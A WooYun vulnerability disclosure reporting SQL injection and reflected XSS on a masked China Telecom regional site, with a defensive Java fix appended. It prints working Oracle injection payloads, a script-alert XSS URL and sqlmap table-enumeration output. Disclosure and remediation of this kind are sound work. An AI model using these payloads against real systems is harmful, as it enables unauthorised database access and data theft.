
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0149099

Title: SQL injection at one location of a regional China Telecom site / XSS pop-up possible (4 databases)

Affected vendor: China Telecom

Author: Hackshy

Submitted: 2015-10-26 16:03

Fixed: 2015-12-14 16:42

Published: 2015-12-14 16:42

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-26: Details reported to the vendor, awaiting vendor handling
2015-10-30: Vendor has confirmed; details visible to the vendor only
2015-11-09: Details disclosed to core white hats and relevant domain experts
2015-11-19: Details disclosed to regular white hats
2015-11-29: Details disclosed to intern white hats
2015-12-14: Details disclosed to the public

Brief description:

China Telecom. Found this a long time ago; just submitting it now.

Detailed description:

Injection URL:

http://**.**.**.**/nos/speedtest/saveuserinfo.jsp?account=

[three screenshots of the injection result omitted]


Also submitting one XSS:

http://**.**.**.**/gxwap/fluxList.do?typeId=2<script>alert('wooyun')</script>

[screenshot of the alert pop-up omitted]

Proof of vulnerability:

Tables enumerated:

Parameter: account (GET)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: account=%00' AND 7775=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (7775=7775) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL) AND 'jhMO'='jhMO
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: account=%00' AND 9590=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR(77)||CHR(84)||CHR(76),5) AND 'xkha'='xkha
---
web application technology: JSP
back-end DBMS: Oracle
Database: SYS
[12 tables]
+--------------------------------+
| DUAL |
| AUDIT_ACTIONS |
| IMPDP_STATS |
| KU$NOEXP_TAB |
| ODCI_SECOBJ$ |
| ODCI_WARNINGS$ |
| PLAN_TABLE$ |
| PSTUBTBL |
| STMT_AUDIT_OPTION_MAP |
| SYSTEM_PRIVILEGE_MAP |
| TABLE_PRIVILEGE_MAP |
| WRI$_ADV_ASA_RECO_DATA |
+--------------------------------+
Database: SLVIEW
[507 tables]
+--------------------------------+
| MODULE |
| ACCESSRAWINFO |
| ACCESSSTATINFO |
| ADDRSECTION |
| ADRATEMOD |
| ADSLSNMPDEPLOY |
| AGENTSERVER |
| AGENTSERVERTYPE |
| ANPORTPERFSUMMON |
| ANPORTPERFSUMWEEK |
| APSCIRCUIT |
| AREADSLAMPORTCOUNT |
| AREAINFO |
| AREATESTPATH |
| AUDITDRIVERASSIGNRULE |
| BASDNSCOM |
| BASDNSCOMMAP |
| BASTAGMONIDAILYINFO |
| BASTAGMONIHOURLYINFO |
| BASTAGMONIRAWINFO |
| BATCHWS |
| BBACCESSTYPE |
| BBUSERTYPE |
| BGPAS |
| BRASDROPRATEDAILY |
| CABLE |
| CARDEXTINFO |
| CARDEXTINFOCFG |
| CARDINFO |
| CARDINFOCHANGE |
| CARDMAINTAINRECORD |
| CFGDRIVERASSIGNRULE |
| CFGDRIVERINSTANCE |
| CIRCUIT |
| CIRCUITEXTCFG |
| CIRCUITTYPE |
| CIRENDSTYPE |
| CIRPROP |
| CIRSTATMETHOD |
| CIRSTATTYPE |
| CIRSTATTYPEDEF |
| CIRSTATTYPEDETAIL |
| CIRTRANSTYPE |
| CIRTYPELEVELCONF |
| CITYCODE |
| CITYCODEMAP |
| CITYDAILYJITTER |
| CITYDAILYPERF |
| CITYHOURLYPERF |
| CITYMONTHLYPERF |
| CITYNODECFG |
| CITYRAWPERF |
| CITYRAWPERF_TMP |
| CN2SERVIPVPDN |
| CODEBOOK |
| COLTYPE |
| COMPAREFILERECORD |
| COMPLETEDWSTONOTICE |
| CONVERTCFG |
| CURRENTPARTS |
| CUST |
| CUSTEXTINFO |
| CUSTLEVEL |
| CUSTMANAGER |
| CUSTRESRELA |
| CUSTSERVEXTINFO |
| CUSTSERVEXTINFOCFG |
| CUSTSERVTYPE |
| CUSTTYPE |
| DATACONVERTRULE |
| DEVADDR |
| DEVADDREXT |
| DEVBUSIACTOR |
| DEVCURVTYSESSNUM |
| DEVEXTINFO |
| DEVEXTINFO2 |
| DEVEXTINFOCFG |
| DEVEXTINFOCFG2 |
| DEVICE |
| DEVICEACCOUNT |
| DEVICEDETAILMODEL |
| DEVICEMODEL |
| DEVICEMODELLIB |
| DEVICEPROP |
| DEVICESUPPLIER |
| DEVICETYPE |
| DEVICETYPELIB |
| DEVICEVENDOR |
| DEVIOSCHANGE |
| DEVIPPOOL |
| DEVMODELMONICFG |
| DEVONLINEOPERLOG |
| DEVONLINEOPERTYPE |
| DEVONLINESTATUS |
| DEVUSEDALARMDEF |
| DEVUSEDALARMLEVEL |
| DHC |
| DHCCATINFO |
| DHCEXTENDCFG |
| DHCEXTINFO |
| DHCEXTINFOCFG |
| DHC_TAB |
| DISCDRIVERASSIGNRULE |
| DISCOVEREDIPADDRESS |
| DOCTYPE |
| DROPRATE |
| DROPRATERAW |
| DROPRATESUM |
| DSLAMAPPLYPROFILETYPE |
| DSLAMLOSTPROFILE |
| DSLAMPORTINSCOL |
| DSLAMPORTINSUNQUALIF |
| DSLAMPORTLATESTCON |
| DSLAMPORTPARACUR |
| DSLAMPORTPARAEXAM |
| DSLAMPORTPARASNAPSHOT |
| DSLAMPORTPARATHRESHOLD |
| DSLAMPORTRATEZONE |
| DSLAMPORTTEST |
| DSLAMPORTUNQUALITIME |
| DSLAMSERVPROFILE |
| E8PVCPARA |
| EMS |
| EMSCURVTYSESSNUM |
| EMSSCOPE |
| ENGINEERINFO |
| ERRLOGINFO |
| EXCLUSIVEFUNCS |
| EXIDEVIPPOOL |
| EXIIPPOOLCONFLICT |
| EXTCIRCUIT |
| EXTCIRCUITDETAIL |
| EXTMONIITEMCOLCFG |
| FAVORFUNC |
| FBINTERFACE |
| FBINVOKERECORD |
| FPCIRMATCHRULE |
| FUNCGROUP |
| FUNCGROUPCATCFG |
| FUNCINFO2 |
| FUNCPAGES |
| FUNC_ROLE |
| GROUPFUNCRELA |
| GROUPPORTINFO |
| GRP |
| GRPITEMPARAGRPSCHM |
| GRPITEMPARAGRPSCHMDETAIL |
| GRPTYPE |
| GXMAINLOGINFO |
| HELPDIRKBDOMAP |
| HOST |
| HOSTACCOUNT |
| HOSTADDR |
| HOSTEXTINFO |
| HOSTEXTINFOCFG |
| HOSTPROCESSSTATUS |
| HOSTPROP |
| HOSTTYPE |
| HWCLASS |
| HWMODEL |
| HWTYPE |
| HWTYPEBYMODEL |
| IPADDRESSSEC |
| IPBINDRULEINFO |
| IPBINDRULETYPE |
| IPPOOLCONFLICT |
| IPSYN |
| IPV6ADDRSECT |
| IPV6DEVADDR |
| IPV6HOSTADDR |
| IRPT_CHECKPOLICYINFO |
| IRPT_COMP_MUTISHEET |
| IRPT_COMP_SHEETTEMPLET |
| IRPT_COMP_SUBTEMPLET |
| IRPT_COMP_TEMPLET |
| IRPT_DATABASE |
| IRPT_DATAMODEL |
| IRPT_DATAMODEL_FULLSQL |
| IRPT_DATAMODEL_SQL |
| IRPT_DATAMODEL_TYPE |
| IRPT_DAY |
| IRPT_FILTER_OPERATION |
| IRPT_ITEM |
| IRPT_ITEM_TRAN |
| IRPT_PICTYPE |
| IRPT_SUBJECT |
| IRPT_SUBJECT_CALCULATE |
| IRPT_SUBJECT_CALCULATE_ONLINE |
| IRPT_SUBJECT_CONDEF |
| IRPT_SUBJECT_DIM |
| IRPT_SUBJECT_FILTER |
| IRPT_SUBJECT_FILTERREL |
| IRPT_SUBJECT_MEASURE |
| IRPT_SUBJECT_MEASURE_ONLINE |
| IRPT_SUBJECT_PIC |
| IRPT_TEMPLET_LIMITREL |
| IRPT_TEMPLET_LIMITREL_ONLINE |
| IRPT_TEMPLET_LIMITVALUE |
| IRPT_TEMPLET_LIMITVALUE_ONLINE |
| IRPT_TEMPLET_VALUE |
| IRPT_TEMPLET_VALUE_ONLINE |
| IRPT_WEEK |
| ITEMGROUP |
| ITEMGROUPDETAIL |
| ITE_SG_USERRELA |
| KBCOL |
| KBCOLATTACH |
| KBCOLDETAIL |
| KBDOCATTACH |
| KBDOCUMENT |
| KBDOMAIN |
| KBFAULTHANDLE |
| KBKEYWORDRECORD |
| KBKEYWORDRELA |
| KBREPOSITORY |
| KEYPROCESSDEF |
| LGSRCCONFIG |
| LINETESTRESULT |
| LNSCURSTAT |
| LNSINFO |
| LNSSTATH |
| LNSTESTCFG |
| LNSTESTPDSNCFG |
| LPEXTINFO |
| LPEXTINFOCFG |
| LPINFO |
| MODULELICENSECFG |
| MONITORPAGEDEF |
| MONITORPAGENUMLIMIT |
| MRTGCFGFILE |
| MR_CVPORTTYPE |
| NET |
| NETSCDATACHECK |
| NETSCDATADELAPPLY |
| NETSCDATADELBACKUP |
| NETSCDATADELOBJ |
| NETSCDIAG |
| NETSCDIAGREF |
| NETSCDIRECTION |
| NETSCITEM |
| NETSCITEMCFG |
| NETSCITEMCFGCONF |
| NETSCPERFD |
| NETSCPERFH |
| NETSCRELA |
| NETSCRESTYPE |
| NETSCTDSEC |
| NETSCUSERTYPE |
| NETSCWEBSITE |
| NMSNODEIPBRANCHMAP |
| NMSRESDATA |
| NOBUSYNETSCPERFD |
| NODE |
| NODELEVEL |
| NODEMAPFORWH |
| NODERESRELA |
| OMITCIR |
| ONLINESPANSTAT |
| ONLINEUSER |
| OPERLOGINFO |
| OPERLOGMODULE |
| OPERTYPE |
| OPERTYPEMAP |
| PAGEGUIDECONF |
| PAGELOGINFO |
| PAGEMODULE |
| PARTITIONCLEANCFG |
| PARTITIONERRORLOG |
| PARTITIONOPERLOG |
| PARTSHISTORY |
| PERFPARACFG |
| PMHOST |
| PMSTATUS |
| POLGRPPINGCONF |
| POLICYGROUPINFO |
| PONCFG |
| PORTBANDWIDTHCLASS |
| PORTINFO |
| PORTINFOCHANGE |
| PORTRATECFG |
| PORTRATEDAILY |
| PORTRATEDETAILMON |
| PORTRATEMONTH |
| PORTRATERAW |
| PORTRATESUM |
| PORTSPEEDSTAT |
| PORTVLANRELA |
| PPEXTINFO |
| PPEXTINFOCFG |
| PPINFO |
| PROBEAGENTCFG |
| PROBEHOST |
| PROBEIP |
| PROBERES |
| PROBERESTRICTIONS |
| PROVIDER |
| PROVIDERQOSLEVELMAPPING |
| PROVIDERQOSMODE |
| PROVIDERTYPE |
| PROVINCEINFO |
| QOSCLASS |
| QOSCLASSMAP |
| QOSPOL |
| QOSPOLDEPLOY |
| QOSPOLTYPE |
| QOSPOLTYPECHAR |
| QOSPORTANALYZE |
| QOSPORTANCLASS |
| QOSQUEUE |
| QUERYPAGEDISPCONF |
| REPORTRESMATCHRULE |
| REPORTTEMPTABLE |
| RES |
| RESCFGCOLITEM |
| RESCLASS |
| RESCOLITEMPROFILE |
| RESCOLPROGCFG |
| RESCOLTIMEPLAN |
| RESCOLTIMEPLANDETAIL |
| RESCURINFO |
| RESGROUP |
| RESMONICURINFO |
| RESMONIDAILYINFO |
| RESMONIDERIVEDITEMCFG |
| RESMONIHOURLYINFO |
| RESMONIITEMCFG |
| RESMONIITEMCOLCFG |
| RESMONIITEMLIB |
| RESMONIMONTHLYINFO |
| RESMONIRAWINFO |
| RESMONITHRESHOLD |
| RESPARATAG |
| RESPARATAGFULL |
| RESRELATION |
| RESSTATCURINFO |
| RESSTATHISINFO |
| RESSTATITEMCFG |
| RESSTATTIME |
| RESSTATTIMERELA |
| RESSUMBP |
| RESSUMGROUP |
| RESTAG |
| RESTAGFULL |
| RESTYPE |
| RESUPDATE |
| RESVALIDHIS |
| RESVENDOR |
| RIGHTMENU2GROUPINFO |
| RIGHTMENUINFO |
| RIGHTMENUPAGERELA |
| RIGHTMENU_ROLE |
| ROLEGROUPRELA |
| ROLEINFO |
| ROLEKBAUTH |
| ROLERPTTEMPLETRELA |
| ROUNDEDIFSPEEDDEF |
| RPTBASRES |
| RPTHIS |
| RPTPAGEDEF |
| RPTPAGEVAL |
| RPTSUBSCRIPTION |
| RPTTEMPLET |
| RPTTEMPLETTYPE |
| RPTTEMPLETTYPELIB |
| RPTTEMPLET_ONLINE |
| RPTTREE |
| RP_DISPTHRESHOLD |
| SAVERESULT |
| SERV |
| SERVADSL |
| SERVAUDITTASKDETAIL |
| SERVCFGPARA |
| SERVCFGTASKDETAIL |
| SERVCFGTASKEXTRATMP |
| SERVCFGTASKPARA |
| SERVCFGTEMPLET |
| SERVCFGTMPDETAIL |
| SERVCHANGE |
| SERVCLASS |
| SERVCUSTIP |
| SERVDISCTASKDETAIL |
| SERVMODEL |
| SERVRPTHIS |
| SERVRPTSUBSCRIPTION |
| SERVRPTTYPE |
| SERVTASKDISASSEMBLECUSTOMIZE |
| SERVTASKLOGDETAILOLD |
| SERVTASKLOGOLD |
| SERVTASKMANOBJECT |
| SERVTASKOLD |
| SERVTASKSCHEDULEOLD |
| SERVTYPE |
| SERVTYPEMAP |
| SGSYSTEM |
| SGSYSTEMOTHERFIELDINFO |
| SGSYSTEMUSERINFO |
| SINGLEUSERNODEAUTH |
| SINGLEUSERRESAUTH |
| SLOTEXTINFO |
| SLOTEXTINFOCFG |
| SLOTINFO |
| SLOTINFOCHANGE |
| SLRELACIR |
| SLSERV |
| SLSERVHIS |
| SPEEDDEFFORPORTTYPECONV |
| SPEEDMAP |
| SPEEDRANGEDEF |
| SPEEDSVRIPRANGE |
| SPEEDSVRIPRANGE0408 |
| SPEEDSVRIPRANGE150319 |
| SPEEDSVRIPRANGE20130410 |
| SPEEDSVRIPRANGE20131107 |
| SPEEDSVRIPRANGE20150129 |
| SPEEDSVRIPRANGE20150316 |
| SPEEDSVRIPRANGEBAK20121111 |
| SPEEDSVRIPRANGEBAK20130115 |
| SPEEDSVRIPRANGEBAK20130316 |
| SPEEDSVRIPRANGEBAK20140425 |
| SPEEDSVRIPRANGEBAKOLD |
| SPEEDTESTFTP |
| SPEEDTESTFTP20130426 |
| SPEEDTESTFTPBAK20130501 |
| SPEEDTESTFTPGJ |
| SPEEDTESTFTPTMP |
| SPEEDTESTFTPTMP |
| SPEEDTESTHTTP |
| SPEEDTESTHTTPGJ |
| SPEEDTESTHTTPTMP |
| SPEEDTESTPING |
| SPEEDTESTPINGGJ |
| SPEEDTESTSVR |
| SPEEDTESTSVRNODE |
| SPEEDTESTUSER |
| SPEEDTESTUSERTMP |
| SPEEDTESTUSRCLASSCFG |
| SPEEDTESTVIDEO |
| SPEEDTESTVIDEOGJ |
| SPEEDTESTWEBSITE |
| STATGROUPDETAIL |
| STATGROUPINFO |
| STATSHOWCONTENT |
| STATSHOWCONTENTD |
| STATSHOWCONTENTRAW |
| STATSHOWCUSTERMIZE |
| STATTIMESCHEME |
| STATTIMESCHEMEDETAIL |
| SUMANAGRP |
| SUMANAGRPDETAIL |
| SYSENTRYLOG |
| SYSPARA |
| TAG |
| TAGEXTDEF |
| TAGEXTRES |
| TAGTEMPLET |
| TAGTREE |
| TAGTREECFG |
| TAGTREECHANGELOG |
| TAGTREENODECODE_RES |
| TAGTREENODERESDEF |
| TAGTYPE |
| TEMPLETPARA |
| TESTRESULTDEFINE |
| TESTRESULTRULE |
| TESTRESULTRULEITEM |
| TESTTYPE |
| TIMESLOTDEFINE |
| TIMESLOTSTAT |
| TIMESPANDEFINE |
| TOPSPSTAT |
| TRUNKLINE |
| UDFSERVCFGTEMPLET |
| UICUSTERMIZE |
| UNQUALIPORTSTAT |
| USERADDRACL |
| USERAUTHMODREC |
| USERAUTHUPDATE |
| USERCUSTMGRRELA |
| USERINFO |
| USERKBAUTH |
| USERMAINPAGECFG |
| USERNODEUPDATE |
| USERORGANIZE |
| USERRESAUTH |
| USERRESUPDATE |
| USERSTATGRPVIEWAUTH |
| USERTAGTREEAUTH |
| USERTEMPLETCFGAUTH |
| USERTEMPLETUSEAUTH |
| USER_ROLE |
| VIDEOTESTFILE |
| VIDEOTESTFILETYPE |
| VLAN |
| VLANPORT |
| VLANPORTRELA |
| VPNBGPTEMPMODOPERLOG |
| VPNQOSPOLICY |
| VPNQOSUDFMATCHRULE |
| VRRPGROUP |
| WEBSERVICELOG |
| WORKSHEETEXTCFG |
| WORKSHEETEXTDISPCFG |
| WORKSHEETRELA |
| WREDPARACFG |
| WSEXTRATMP |
| WSEXTRATMPPARA |
| XMLRAWINFO |
+--------------------------------+
Database: OLAPSYS
[9 tables]
+--------------------------------+
| CWM2$AWCUBECREATEACCESS |
| CWM2$AWDIMCREATEACCESS |
| CWM2$_AW_NEXT_TEMP_CUST_MEAS |
| CWM2$_AW_TEMP_CUST_MEAS_MAP |
| CWM2$_TEMP_VALUES |
| OLAP_SESSION_CUBES |
| OLAP_SESSION_DIMS |
| XML_LOAD_LOG |
| XML_LOAD_RECORDS |
+--------------------------------+
Database: SYSTEM
[7 tables]
+--------------------------------+
| DEF$_TEMP$LOB |
| MVIEW$_ADV_INDEX |
| MVIEW$_ADV_OWB |
| MVIEW$_ADV_PARTITION |
| OL$ |
| OL$HINTS |
| OL$NODES |
+--------------------------------+


Not going any deeper.

Fix suggestion:

Filter user input.
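As an added example (not code from this report or from the affected site), the controls that address the two findings on a JSP/JDBC stack like the one identified by sqlmap: binding the `account` parameter with a `PreparedStatement` instead of concatenating it into SQL text, an allow-list check on its format, and HTML-encoding the `typeId` value before it is reflected into the page. The table name `USER_INFO_TABLE`, its column names and the account-format pattern are assumptions; the inputs in `main` are constructed to mirror the shape of the reported payloads.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.util.regex.Pattern;

/**
 * Added example, not the site's own code. USER_INFO_TABLE and its columns
 * are hypothetical placeholders; the account format is an assumption.
 */
public class SpeedtestInputHardening {

    // Assumed shape of the vulnerable saveuserinfo.jsp: the request parameter
    // is concatenated into the SQL text, so a quote inside "account" closes the
    // string literal and whatever follows is parsed as SQL. Shown for contrast.
    static String vulnerableSql(String account) {
        return "SELECT ACCOUNT FROM USER_INFO_TABLE WHERE ACCOUNT = '" + account + "'";
    }

    // Hardened: the value is bound to a placeholder and reaches Oracle as data.
    // The SQL parser never sees it, so quotes, NUL bytes or function calls
    // inside the value are inert.
    static boolean accountExists(Connection conn, String account) throws SQLException {
        String sql = "SELECT 1 FROM USER_INFO_TABLE WHERE ACCOUNT = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, account);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next();
            }
        }
    }

    // Defence in depth: an allow-list for what an account identifier may look
    // like (assumed format). Anything else, including the %00 prefix seen in
    // the reported payloads, is rejected before the database layer.
    private static final Pattern ACCOUNT_FORMAT =
            Pattern.compile("^[A-Za-z0-9_@.\\-]{1,64}$");

    static boolean isWellFormedAccount(String account) {
        return account != null && ACCOUNT_FORMAT.matcher(account).matches();
    }

    // For the fluxList.do finding: encode the parameter before it is reflected
    // into HTML so that browser-significant characters render as text.
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        // Constructed inputs mirroring the shape of the reported payloads.
        String sqliStyle = "\u0000' AND 1=1 AND 'a'='a";
        String xssStyle = "2<script>alert('wooyun')</script>";

        System.out.println("concatenated SQL (unsafe): " + vulnerableSql(sqliStyle));
        System.out.println("allow-list accepts payload?  " + isWellFormedAccount(sqliStyle));
        System.out.println("allow-list accepts 'user01'? " + isWellFormedAccount("user01"));
        System.out.println("typeId encoded for HTML: " + escapeHtml(xssStyle));
        // accountExists(conn, ...) needs a live JDBC Connection and is not invoked here.
    }
}
```

The prepared statement is the control that actually removes the injection; the allow-list only narrows the attack surface and would not be sufficient on its own. For the XSS, the encoding must match the context the value lands in (HTML body here); a value placed inside a JavaScript block or an attribute needs that context's encoding instead.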

Copyright notice: when reposting, credit the source as Hackshy@WooYun


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-10-30 16:40

Vendor reply:

CNVD has confirmed and reproduced the reported issue; it has been forwarded via CNCERT to China Telecom Group, which will coordinate handling with the website's management department.

Latest status:

None yet